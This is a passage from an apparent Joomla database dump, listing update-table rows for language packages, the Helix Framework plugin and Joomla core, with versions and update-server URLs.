g_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(593,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(594,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(595,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(596,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(597,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(598,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(599,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(600,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(601,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(602,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(603,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(604,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(605,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(606,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(607,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(608,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(609,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(610,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(611,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(612,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(613,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(614,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(615,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(616,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(617,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(618,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(619,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(620,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(621,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(622,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(623,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(624,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(625,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(626,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(627,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(628,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(629,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(630,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(631,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(632,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(633,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(634,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(635,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(636,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(637,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(638,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(639,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(640,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(641,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(642,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(643,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(644,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(645,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(646,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(647,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(648,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(649,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(650,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(651,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(652,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(653,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(654,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(655,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(656,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(657,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(658,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(659,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(660,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(661,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(662,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(663,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(664,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(665,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(666,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(667,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(668,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(669,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(670,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(671,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(672,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(673,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(674,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(675,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(676,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(677,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(678,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(679,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(680,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(681,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(682,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(683,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(684,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(685,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(686,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(687,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(688,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(689,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(690,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(691,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(692,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(693,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(694,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(695,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(696,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(697,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(698,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(699,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(700,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(701,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(702,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(703,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(704,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(705,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(706,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(707,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(708,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(709,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(710,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(711,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(712,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(713,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(714,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(715,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(716,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(717,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(718,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(719,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(720,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(721,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(722,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(723,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(724,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(725,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(726,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(727,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(728,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(729,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(730,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(731,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(732,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(733,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(734,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(735,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(736,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(737,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(738,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(739,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(740,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(741,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(742,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(743,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(744,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(745,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(746,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(747,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(748,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(749,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(750,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(751,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(752,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(753,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(754,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(755,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(756,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(757,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(758,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(759,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(760,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(761,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(762,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(763,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(764,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(765,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(766,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(767,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(768,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(769,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(770,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(771,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(772,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(773,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(774,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(775,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(776,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(777,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(778,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(779,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(780,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(781,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(782,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(783,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(784,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(785,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(786,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(787,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(788,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(789,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(790,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(791,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(792,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(793,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(794,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(795,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(796,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(797,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(798,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(799,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(800,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(801,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(802,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(803,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(804,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(805,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(806,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(807,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(808,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(809,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(810,3,0,0,'Bahasa 